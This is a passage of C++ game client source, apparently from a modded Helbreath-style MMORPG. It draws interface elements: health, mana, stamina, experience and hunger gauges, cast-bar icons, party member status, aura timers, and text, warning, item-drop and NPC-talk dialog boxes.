            m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(550 + resx, 455 + resy, 10, dwTime);
            wsprintf(G_cTxt, "Player Panel");
            PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
        }
        if ((msX > 571 + resx) && (msX < 593 + resx)) { // History
            m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(572 + resx, 455 + resy, 11, dwTime);
            wsprintf(G_cTxt, "Chat History");
            PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
        }
		if ((msX > 595 + resx) && (msX < 615 + resx)) { // F1
            m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(595 + resx, 455 + resy, 13, dwTime);
            wsprintf(G_cTxt, "Help");
            PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
        }
        if ((msX > 616 + resx) && (msX < 638 + resx)) { // System Menu
            m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(617 + resx, 455 + resy, 18, dwTime);
            wsprintf(G_cTxt, "Options");
            PutString(msX-20, msY-20, G_cTxt, RGB(250,250,220));
        }
    }
	if ((msX > 128 + resx) && (msX < 136 + resx) && (msY > 432 + resy)) { // Hunger Status Bar
		wsprintf(G_cTxt, "Hunger (%d%%)", 100 - iHungerStatus);
		PutString(msX-20, msY-20, G_cTxt, RGB(250,250,220));
    }
	// Experience Gauge - MORLA - Fixed
    if ((msX > 0 + resx) && (msX < 640 + resx) && (msY > 426 + resy) && (msY < 430 + resy)) 
	{
		unsigned long iNextExp;
        if(m_iMajesticLevel == 0) 
		{
			iNextExp = iGetLevelExp(m_iLevel+1);
		}
        else 
		{
			iNextExp = iGetLevelExp(m_iLevel+m_iMajesticLevel+1);
		}
        wsprintf(G_cTxt, "Exp: %d / %d", m_iExp, iNextExp);
        PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
    }

	// MORLA - agregando el icono para la magia o item en la Bar Cast
	if (bBarCast1 >= 100) {
        m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutTransSprite(283 + resx, 454 + resy, 19, dwTime);
	}
	else
	{
		if (iBarCast1 != 0)
		m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT + m_pItemList[iBarCast1]->m_sSprite]->PutSpriteFast(283 + resx, 454 + resy, m_pItemList[iBarCast1]->m_sSpriteFrame, dwTime);

	}
		if (bBarCast2 >= 100) {
        m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutTransSprite(327 + resx, 454 + resy, 19, dwTime);
	}
	else
	{
		if (iBarCast2 != 0)
		m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT + m_pItemList[iBarCast2]->m_sSprite]->PutSpriteFast(327 + resx, 454 + resy, m_pItemList[iBarCast2]->m_sSpriteFrame, dwTime);

	}
	if (bBarCast3 >= 100) {
        m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutTransSprite(370 + resx, 454 + resy, 19, dwTime);
	}
	else
	{
		if (iBarCast3 != 0)
		m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT + m_pItemList[iBarCast3]->m_sSprite]->PutSpriteFast(370 + resx, 454 + resy, m_pItemList[iBarCast3]->m_sSpriteFrame, dwTime);

	}
	if (bBarCast4 >= 100) {
        m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutTransSprite(411 + resx, 454 + resy, 19, dwTime);
	}
	else
	{
		if (iBarCast4 != 0)
		m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT + m_pItemList[iBarCast4]->m_sSprite]->PutSpriteFast(411 + resx, 454 + resy, m_pItemList[iBarCast4]->m_sSpriteFrame, dwTime);

	}
	if (bBarCast5 >= 100) {
        m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutTransSprite(454 + resx, 454 + resy, 19, dwTime);
	}
	else
	{
		if (iBarCast5 != 0)
		m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT + m_pItemList[iBarCast5]->m_sSprite]->PutSpriteFast(454 + resx, 454 + resy, m_pItemList[iBarCast5]->m_sSpriteFrame, dwTime);

	}
	
	// MORLA - Cuando pasan el mouse por encima del icono
	if ((435 + resy < msY) && (475 + resy > msY)) 
	{ // MORLA - cuando suelta el item
		if ((263 + resx <= msX) && (303 + resx >= msX))
		{
			if (bBarCast1 >= 100) 
			{
				wsprintf(G_cTxt, "%s (1)", m_pMagicCfgList[bBarCast1-100]->m_cName);
				PutString(msX-10, msY-20, G_cTxt, RGB(0,255,220));
			}
			else 
			{
				if (iBarCast1 != 0)
				{
					wsprintf(G_cTxt, "%s (1)", m_pItemList[iBarCast1]->m_cName);
				}
				else {
					wsprintf(G_cTxt, "%s (1)", MSG_SHORTCUT1);
				}
				PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
			}
		}

		if ((306 + resx <= msX) && (346 + resx >= msX)) {
			if (bBarCast2 >= 100) {
				wsprintf(G_cTxt, "%s (2)", m_pMagicCfgList[bBarCast2-100]->m_cName);
				PutString(msX-10, msY-20, G_cTxt, RGB(0,255,220));
			}
			else {
				if (iBarCast2 != 0)
				{
					wsprintf(G_cTxt, "%s (2)", m_pItemList[iBarCast2]->m_cName);
				}
				else {
					wsprintf(G_cTxt, "%s (2)", MSG_SHORTCUT1);
				}
				PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
			}
		}
		if ((348 + resx <= msX) && (388 + resx >= msX)) {
			if (bBarCast3 >= 100) {
				wsprintf(G_cTxt, "%s (3)", m_pMagicCfgList[bBarCast3-100]->m_cName);
				PutString(msX-10, msY-20, G_cTxt, RGB(0,255,220));
			}
			else {
				if (iBarCast3 != 0)
				{
					wsprintf(G_cTxt, "%s (3)", m_pItemList[iBarCast3]->m_cName);
				}
				else {
					wsprintf(G_cTxt, "%s (3)", MSG_SHORTCUT1);
				}
				PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
			}
		}
		if ((390 + resx <= msX) && (430 + resx >= msX)) {
			if (bBarCast4 >= 100) {
				wsprintf(G_cTxt, "%s (4)", m_pMagicCfgList[bBarCast4-100]->m_cName);
				PutString(msX-10, msY-20, G_cTxt, RGB(0,255,220));
			}
			else {
				if (iBarCast4 != 0)
				{
					wsprintf(G_cTxt, "%s (4)", m_pItemList[iBarCast4]->m_cName);
				}
				else {
					wsprintf(G_cTxt, "%s (4)", MSG_SHORTCUT1);
				}
				PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
			}
		}
		if ((433 + resx <= msX) && (473 + resx >= msX)) {
			if (bBarCast5 >= 100) {
				wsprintf(G_cTxt, "%s (5)", m_pMagicCfgList[bBarCast5-100]->m_cName);
				PutString(msX-10, msY-20, G_cTxt, RGB(0,255,220));
			}
			else {
				if (iBarCast5 != 0)
				{
					wsprintf(G_cTxt, "%s (5)", m_pItemList[iBarCast5]->m_cName);
				}
				else {
					wsprintf(G_cTxt, "%s (5)", MSG_SHORTCUT1);
				}
				PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
			}
		}
	}

	DWORD dwTimeThis = timeGetTime(); // MORLA 2.3 - Muestra el icono de Holy Shit etc...
	if(dwTimeThis < dwTimeLastMsg) { 
		if (iKillAnnouncer == 1)
			m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutTransSprite(200, 8, 39, dwTime);
		if (iKillAnnouncer == 2)
			m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutTransSprite(200, 8, 40, dwTime);
		if (iKillAnnouncer == 3)
			m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutTransSprite(200, 8, 41, dwTime);
		if (iKillAnnouncer == 4)
			m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutTransSprite(200, 8, 42, dwTime);
	}

	if (m_bShowParty)
	{
		//New Party Status - ZeroEoyPnk - 04/09/2010
		if (m_iPartyStatus != NULL)
		{
			if (ActualizarParty == TRUE)
			{
				bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_JOINPARTY, NULL, 2, NULL, NULL, m_cMCName);
				bSendCommand(MSGID_COMMAND_COMMON, DEF_RESQUEST_PARTYHP, NULL, NULL, NULL, NULL, NULL);
				ActualizarParty = FALSE;
			}
			for (int i = 0; i <= DEF_MAXPARTYMEMBERS; i++)
			{
				if (strlen(m_stPartyMemberNameList[i].cName) != 0) {
					if (iPartySex[i] == 1)
					{
						m_pSprite[DEF_SPRID_INTERFACE_ND_PARTYSTATUS]->PutSpriteFast(16 + 71*i, 8, i, dwTime);
						
					}
					else
					{
						m_pSprite[DEF_SPRID_INTERFACE_ND_PARTYSTATUS]->PutSpriteFast(16 + 71*i, 8, 8 + i, dwTime);
						 
					}
					wsprintf(G_cTxt, "%s", m_stPartyMemberNameList[i].cName);
					PutAlignedString(71 * i, 71 * (i + 1), 45, G_cTxt, 220, 130, 45);
					m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(3 + 71 * i, 60, 28, dwTime);
					m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(3 + 71 * i, 65, 28, dwTime);
				}
			}
		}
	}

	//MORLA - Iconos Auras
	// centu - modificado
	next = 0;
	if (m_bShowEmblems)
	{
		if (m_bIsDialogEnabled[9])
		{
			if (bPfm)
			{
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(601 + resx + 100 - 10, 133 + next, 21 + 1, dwTime);
				wsprintf(G_cTxt, "%d", m_sPfm);
				if (m_sPfm < 11)
				{
					PutString2(601 + resx + 100 - 10, 133 + next, G_cTxt, 255, 0, 0);
				}
				else
				{
					PutString2(601 + resx + 100 - 10, 133 + next, G_cTxt, 255, 255, 255);
				}
				next += 35;
			}
			if (bZerk)
			{
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(601 + resx + 100 - 10, 133 + next, 20 + 1, dwTime);
				wsprintf(G_cTxt, "%d", m_sZerk);
				if (m_sZerk < 11)
				{
					PutString2(601 + resx + 100 - 10, 133 + next, G_cTxt, 255, 0, 0);
				}
				else
				{
					PutString2(601 + resx + 100 - 10, 133 + next, G_cTxt, 255, 255, 255);
				}
				next += 35;
			}
			if (bInv)
			{
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(601 + resx + 100 - 10, 133 + next, 19 + 1, dwTime);
				wsprintf(G_cTxt, "%d", m_sInv);
				if (m_sInv < 11) {

					PutString2(601 + resx + 100 - 10, 133 + next, G_cTxt, 255, 0, 0);
				}
				else {
					wsprintf(G_cTxt, "%d", m_sInv);
					PutString2(601 + resx + 100 - 10, 133 + next, G_cTxt, 255, 255, 255);
				}
				next += 35;
			}
			if (bShield)
			{
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(601 + resx + 100 - 10, 133 + next, 23 + 1, dwTime);
				wsprintf(G_cTxt, "%d", m_sShield);
				if (m_sShield < 11) {

					PutString2(601 + resx + 100 - 10, 133 + next, G_cTxt, 255, 0, 0);
				}
				else {

					PutString2(601 + resx + 100 - 10, 133 + next, G_cTxt, 255, 255, 255);
				}
				next += 35;
			}
			if (bPfa)
			{
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(601 + resx + 100 - 10, 133 + next, 22 + 1, dwTime);
				wsprintf(G_cTxt, "%d", m_sPfa);
				if (m_sPfa < 11) {

					PutString2(601 + resx + 100 - 10, 133 + next, G_cTxt, 255, 0, 0);
				}
				else {

					PutString2(601 + resx + 100 - 10, 133 + next, G_cTxt, 255, 255, 255);
				}
				next += 35;
			}
		}
		else
		{
			if (bPfm)
			{
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(601 + resx + 100 - 10, 5 + next, 21 + 1, dwTime);
				wsprintf(G_cTxt, "%d", m_sPfm);
				if (m_sPfm < 11) {

					PutString2(601 + resx + 100 - 10, 5 + next, G_cTxt, 255, 0, 0);
				}
				else {

					PutString2(601 + resx + 100 - 10, 5 + next, G_cTxt, 255, 255, 255);
				}
				next += 35;
			}
			if (bZerk)
			{
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(601 + resx + 100 - 10, 5 + next, 20 + 1, dwTime);
				wsprintf(G_cTxt, "%d", m_sZerk);
				if (m_sZerk < 11) {

					PutString2(601 + resx + 100 - 10, 5 + next, G_cTxt, 255, 0, 0);
				}
				else {

					PutString2(601 + resx + 100 - 10, 5 + next, G_cTxt, 255, 255, 255);
				}
				next += 35;
			}
			if (bInv)
			{
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(601 + resx + 100 - 10, 5 + next, 19 + 1, dwTime);
				wsprintf(G_cTxt, "%d", m_sInv);
				if (m_sInv < 11) {

					PutString2(601 + resx + 100 - 10, 5 + next, G_cTxt, 255, 0, 0);
				}
				else {

					PutString2(601 + resx + 100 - 10, 5 + next, G_cTxt, 255, 255, 255);
				}
				next += 35;
			}
			if (bShield)
			{
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(601 + resx + 100 - 10, 5 + next, 23 + 1, dwTime);
				wsprintf(G_cTxt, "%d", m_sShield);
				if (m_sShield < 11) {

					PutString2(601 + resx + 100 - 10, 5 + next, G_cTxt, 255, 0, 0);
				}
				else {

					PutString2(601 + resx + 100 - 10, 5 + next, G_cTxt, 255, 255, 255);
				}
				next += 35;
			}
			if (bPfa)
			{
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(601 + resx + 100 - 10, 5 + next, 22 + 1, dwTime);
				wsprintf(G_cTxt, "%d", m_sPfa);
				if (m_sPfa < 11) {

					PutString2(601 + resx + 100 - 10, 5 + next, G_cTxt, 255, 0, 0);
				}
				else {

					PutString2(601 + resx + 100 - 10, 5 + next, G_cTxt, 255, 255, 255);
				}
				next += 35;
			}
		}

		if (m_stMCursor.sCursorFrame == 4){
			bInv = false;
			m_sInv = 0;
		}
	}
}

//New Gauge Pannel System ;D
void CGame::DrawDialogBox_GaugePannel()
{		
    int iMaxPoint, iBarWidth, iTemp;
	int resy, resx;
#ifdef RES_HIGH
	resy = 120;
	resx = 80;
#else
	resi = 0;
#endif

	// MORLA - Barras de hp sp mp y exp
    // Health Gauge
    iMaxPoint = m_iVit*3 + (m_iLevel+m_iMajesticLevel)*2 + ((m_iStr + m_iAngelicStr)/2);
    iBarWidth = 101 - (m_iHP*101)/iMaxPoint;
    if( iBarWidth < 0 ) iBarWidth = 0;
    if( iBarWidth > 101 ) iBarWidth = 101;
    m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFastWidth(4 + resx, 434+ resy,  12, iBarWidth, m_dwCurTime, false);
    iTemp = m_iHP;
    wsprintf(G_cTxt, "%d", iTemp);
    if (m_bIsPoisoned) {
        PutString_SprNum(50 + resx, 435 + resy, G_cTxt, m_wR[5]*11, m_wG[5]*11, m_wB[5]*11);
        PutString_SprFont3(50 + resx, 433 + resy, "Poisoned", m_wR[5]*8, m_wG[5]*8, m_wB[5]*8, TRUE, 2);
    }
    else PutString_SprNum(58 + resx, 435 + resy, G_cTxt, 200, 100, 100);

    // Mana Gauge
    iMaxPoint = ((m_iMag + m_iAngelicMag)*2) + (m_iLevel + m_iMajesticLevel) *2 + ((m_iInt + m_iAngelicInt)/2);
    iBarWidth = 101 - (m_iMP*101)/iMaxPoint;
    if( iBarWidth < 0 ) iBarWidth = 0;
    if( iBarWidth > 101 ) iBarWidth = 101;
    m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFastWidth(3 + resx, 451 + resy,  12, iBarWidth, m_dwCurTime, false);
    iTemp = m_iMP;
    wsprintf(G_cTxt, "%d", iTemp);
    PutString_SprNum(58 + resx, 450 + resy, G_cTxt, 100, 100, 200);

    // Stamina Gauge
    iMaxPoint = ((m_iStr + m_iAngelicStr)*2) + (m_iLevel + m_iMajesticLevel) *2;
    iBarWidth = 101 - (m_iSP*101)/iMaxPoint;
    if( iBarWidth < 0 ) iBarWidth = 0;
    if( iBarWidth > 101 ) iBarWidth = 101;
    m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFastWidth(3 + resx, 467 + resy, 12, iBarWidth, m_dwCurTime, false);
    iTemp = m_iSP;
    wsprintf(G_cTxt, "%d", iTemp);
    PutString_SprNum(58 + resx, 465 + resy, G_cTxt, 100, 100, 200);

    // Experience Gauge - MORLA - arreglada para que vaya de izquierda a derecha
	// centu - agregado majestic level
	unsigned long iMaxPoint3;
	if (m_iMajesticLevel == 0) 
	{
		iMaxPoint3 = iGetLevelExp(m_iLevel+1) - iGetLevelExp(m_iLevel);
	}
	else
	{
		iMaxPoint3 = iGetLevelExp(m_iLevel+m_iMajesticLevel+1) - iGetLevelExp(m_iLevel + m_iMajesticLevel);
	}

    unsigned long uTemp = m_iExp - iGetLevelExp(m_iLevel + m_iMajesticLevel);
    iBarWidth = (uTemp *800) / iMaxPoint3;
    if( iBarWidth < 0 ) iBarWidth = 0;
    if( iBarWidth > 800 ) iBarWidth = 800;
    m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL2]->PutSpriteFastWidth(0, 427 + resy, 1, iBarWidth, m_dwCurTime, false);
	uTemp = uTemp - iMaxPoint3;

	// MORLA2 - Hunger Status
    iMaxPoint = 100;
	iTemp = iHungerStatus;
    iBarWidth = 42 - (iHungerStatus*42)/100;
    if( iBarWidth < 0 ) iBarWidth = 0;
    if( iBarWidth > 42 ) iBarWidth = 42;
    m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFastWidth(130 + resx, 436 + resy, 25, iBarWidth, m_dwCurTime, true);
	iTemp = iHungerStatus;

	int i;
	if (m_bShowParty) 
	{
		if (m_iPartyStatus != NULL)
		{
			for (i = 0; i <= DEF_MAXPARTYMEMBERS; i++)
			{			
				if (strlen(m_stPartyMemberNameList[i].cName) != 0) 
				{
					if (iPartyHp[i] > iMaxPoint2[i]) iPartyHp[i] = iMaxPoint2[i];
					if (iPartyHp[i] > 0)
					{	
						iBarWidth2[i] = (iPartyHp[i]*66)/iMaxPoint2[i];
						if( iBarWidth2[i] < 0 ) iBarWidth2[i] = 0;
						if( iBarWidth2[i] > 66 ) iBarWidth2[i] = 66;
						m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFastWidth(3 + (71 * i), 60, 26, iBarWidth2[i], m_dwCurTime, false);
					

						if (iPartyMp[i] > iMaxPoint0[i]) iPartyMp[i] = iMaxPoint0[i];
						iBarWidth0[i] = (iPartyMp[i] * 66) / iMaxPoint0[i];
						if (iBarWidth0[i] < 0) iBarWidth0[i] = 0;
						if (iBarWidth0[i] > 66) iBarWidth0[i] = 66;
						m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFastWidth(3 + (71 * i), 65, 27, iBarWidth0[i], m_dwCurTime, false);
					}
				}
			}
		}
	}
}

void CGame::DrawDialogBox_Text(short msX, short msY, short msZ, char cLB)
{
 short sX, sY;
 int i, iTotalLines, iPointerLoc;
 double d1,d2,d3;

	sX = m_stDialogBoxInfo[18].sX;
	sY = m_stDialogBoxInfo[18].sY;

	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME2, sX, sY, 0);

	iTotalLines = 0;
	for (i = 0; i < DEF_TEXTDLGMAXLINES; i++)
	if (m_pMsgTextList[i] != NULL) iTotalLines++;

	if( iTotalLines > 17 ) DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME2, sX, sY, 1);
	if( iGetTopDialogBoxIndex() == 18 && msZ != 0 )
	{
		m_stDialogBoxInfo[18].sView = m_stDialogBoxInfo[18].sView - msZ/60;
		m_DInput.m_sZ = 0;
	}
	if( m_stDialogBoxInfo[18].sView < 0 ) m_stDialogBoxInfo[18].sView = 0;
	if( iTotalLines>17 && m_stDialogBoxInfo[18].sView > iTotalLines-17 ) m_stDialogBoxInfo[18].sView = iTotalLines-17;

	if (iTotalLines > 17) {
		d1 = (double)m_stDialogBoxInfo[18].sView;
		d2 = (double)(iTotalLines-17);
		d3 = (274.0f * d1)/d2;
		iPointerLoc = (int)(d3+0.5f);
		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME2, sX, sY, 1);
		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME2, sX+242, sY+35+iPointerLoc, 7);
	}
	else iPointerLoc = 0;

	for (i = 0; i < 17; i++)
	if (m_pMsgTextList[i + m_stDialogBoxInfo[18].sView] != NULL) {
		if (m_bDialogTrans == FALSE) { // v2.173
			switch (m_pMsgTextList[i + m_stDialogBoxInfo[18].sView]->m_pMsg[0]) {
			case '_': PutAlignedString(sX +24, sX +236, sY + 50 +i*13, (m_pMsgTextList[i + m_stDialogBoxInfo[18].sView]->m_pMsg+1), 255,255,255); break;
			case ';': PutAlignedString(sX +24, sX +236, sY + 50 +i*13, (m_pMsgTextList[i + m_stDialogBoxInfo[18].sView]->m_pMsg+1), 4, 0, 50); break;
			default: PutAlignedString(sX +24, sX +236, sY + 50 +i*13, m_pMsgTextList[i + m_stDialogBoxInfo[18].sView]->m_pMsg, 45,25,25); break;
			}
		}
		else PutAlignedString(sX +24, sX +236, sY + 50 +i*13, m_pMsgTextList[i + m_stDialogBoxInfo[18].sView]->m_pMsg, 0,0,0);
	}

	if (cLB != 0 && iTotalLines > 17) {
		if ((iGetTopDialogBoxIndex() == 18)) {
			if ((msX >= sX + 240) && (msX <= sX + 260) && (msY >= sY + 40) && (msY <= sY + 320)) {
				d1 = (double)(msY -(sY+35));
				d2 = (double)(iTotalLines-17);
				d3 = (d1 * d2)/274.0f;
				iPointerLoc = (int)d3;
				if (iPointerLoc > iTotalLines-17) iPointerLoc = iTotalLines-17;
				m_stDialogBoxInfo[18].sView = iPointerLoc;
			}
		}
	}
	else m_stDialogBoxInfo[18].bIsScrollSelected = FALSE;

	if ((msX > sX + DEF_RBTNPOSX) && (msX < sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY))
		 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + DEF_RBTNPOSX, sY + DEF_BTNPOSY, 1);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + DEF_RBTNPOSX, sY + DEF_BTNPOSY, 0);
}



void CGame::DrawDialogBox_WarningMsg(short msX, short msY)//6
{
    short sX, sY;

	sX = m_stDialogBoxInfo[6].sX;
	sY = m_stDialogBoxInfo[6].sY;

	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME4, sX, sY, 2);

    PutString2(sX + 63, sY + 35, DEF_MSG_WARNING1, 200,200,25);//" ** This is a battle area **"
	PutString(sX + 30, sY + 57, DEF_MSG_WARNING2, RGB(220,130,45) );//"This is a dangerous area where you"
	PutString(sX + 30, sY + 74, DEF_MSG_WARNING3, RGB(220,130,45) );//"cannot protected from others' attack."
	PutString(sX + 30, sY + 92, DEF_MSG_WARNING4, RGB(220,130,45) );//"To play the game in safe, go to the"
	PutString(sX + 30, sY +110, DEF_MSG_WARNING5, RGB(220,130,45) );//" cityhall and change to civilian mode."

	if ((msX >= sX + 122 ) && (msX <= sX + 125 + DEF_BTNSZX ) && (msY >= sY + 127 ) && (msY <= sY + 127 + DEF_BTNSZY))
			 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 122 , sY + 127 , 1);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 122, sY + 127 , 0);

}

void CGame::DrawDialogBox_ItemDrop(short msX, short msY)
{
    short sX, sY;
    char cTxt[120], cStr1[64], cStr2[64], cStr3[64];

	sX = m_stDialogBoxInfo[4].sX;
	sY = m_stDialogBoxInfo[4].sY;

	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME1, sX, sY, 2);

	GetItemName(m_pItemList[m_stDialogBoxInfo[4].sView]->m_cName, m_pItemList[m_stDialogBoxInfo[4].sView]->m_dwAttribute, cStr1, cStr2, cStr3 );

	if (strlen(m_stDialogBoxInfo[4].cStr) == 0)  wsprintf(cTxt, "%s", cStr1);

	if(m_bIsSpecial)
	{	
		if(m_bIsRare)
		{
			PutString(sX + 35, sY + 20, cTxt, RGB(255,208,60));
			PutString(sX + 36, sY + 20, cTxt, RGB(255,208,60));
		}
		else {
			PutString(sX + 35, sY + 20, cTxt, RGB(0,255,50));
			PutString(sX + 36, sY + 20, cTxt, RGB(0,255,50));
		}
	}else
	{	PutString(sX + 35, sY + 20, cTxt, RGB(4,0,50));
		PutString(sX + 36, sY + 20, cTxt, RGB(4,0,50));
	}
	PutString(sX + 35, sY + 36, DRAW_DIALOGBOX_ITEM_DROP1 , RGB(4,0,50));
	PutString(sX + 36, sY + 36, DRAW_DIALOGBOX_ITEM_DROP1, RGB(4,0,50));

	if(m_bItemDrop)
	{	if ((msX >= sX + 35) && (msX <= sX + 240 ) && (msY >= sY + 80) && (msY <= sY + 90))
		{	PutString(sX + 35, sY + 80, DRAW_DIALOGBOX_ITEM_DROP2, RGB(255,255,255));
			PutString(sX + 36, sY + 80, DRAW_DIALOGBOX_ITEM_DROP2, RGB(255,255,255));
		}else
		{	PutString(sX + 35, sY + 80, DRAW_DIALOGBOX_ITEM_DROP2, RGB(4,0,50));
			PutString(sX + 36, sY + 80, DRAW_DIALOGBOX_ITEM_DROP2, RGB(4,0,50));
		}
	}else
	{	if ((msX >= sX + 35) && (msX <= sX + 240 ) && (msY >= sY + 80) && (msY <= sY + 90))
		{	PutString(sX + 35, sY + 80, DRAW_DIALOGBOX_ITEM_DROP3, RGB(255,255,255));
			PutString(sX + 36, sY + 80, DRAW_DIALOGBOX_ITEM_DROP3, RGB(255,255,255));
		}else
		{	PutString(sX + 35, sY + 80, DRAW_DIALOGBOX_ITEM_DROP3, RGB(4,0,50));
			PutString(sX + 36, sY + 80, DRAW_DIALOGBOX_ITEM_DROP3, RGB(4,0,50));
	}	}

	if ((msX >= sX + 30) && (msX <= sX + 30 + DEF_BTNSZX) && (msY >= sY + 55) && (msY <= sY + 55 + DEF_BTNSZY))
			 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 30, sY + 55 ,19);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 30, sY + 55 , 18);

	if ((msX >= sX + 170 ) && (msX <= sX + 170 + DEF_BTNSZX ) && (msY >= sY + 55 ) && (msY <= sY + 55 + DEF_BTNSZY))
			 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 170 , sY + 55 , 3);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 170, sY + 55 , 2);
}

void CGame::DrawDialogBox_NpcTalk(short msX, short msY, char cLB)
{
 short sX, sY;
 int i, iTotalLines, iPointerLoc;
 double d1, d2, d3;
	sX = m_stDialogBoxInfo[21].sX;
	sY = m_stDialogBoxInfo[21].sY;
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME2, sX, sY, 2);

	switch (m_stDialogBoxInfo[21].cMode) {
	case 0: //  OK
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY))
			 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + DEF_RBTNPOSX, sY + DEF_BTNPOSY, 1);
		else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + DEF_RBTNPOSX, sY + DEF_BTNPOSY, 0);
		break;

	case 1: // Accept / Decline
		if ((msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
			 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + DEF_LBTNPOSX, sY + DEF_BTNPOSY, 33);
		else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + DEF_LBTNPOSX, sY + DEF_BTNPOSY, 32);

		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
			 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + DEF_RBTNPOSX, sY + DEF_BTNPOSY, 41);
		else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + DEF_RBTNPOSX, sY + DEF_BTNPOSY, 40);
		break;

	case 2: // Next
		if ((msX >= sX + 190) && (msX <= sX + 278) && (msY >= sY + 296) && (msY <= sY + 316))
			 PutString_SprFont(sX + 190, sY + 270, "Next", 6,6,20);
		else PutString_SprFont(sX + 190, sY + 270, "Next", 0,0,7);
		break;
	}

	for (i = 0; i < 17; i++)
	if ((i < DEF_TEXTDLGMAXLINES) && (m_pMsgTextList2[i + m_stDialogBoxInfo[21].sView] != NULL)) {
		PutAlignedString(sX, sX+m_stDialogBoxInfo[21].sSizeX, sY + 57 +i*15, m_pMsgTextList2[i + m_stDialogBoxInfo[21].sView]->m_pMsg, 45,25,25);
	}
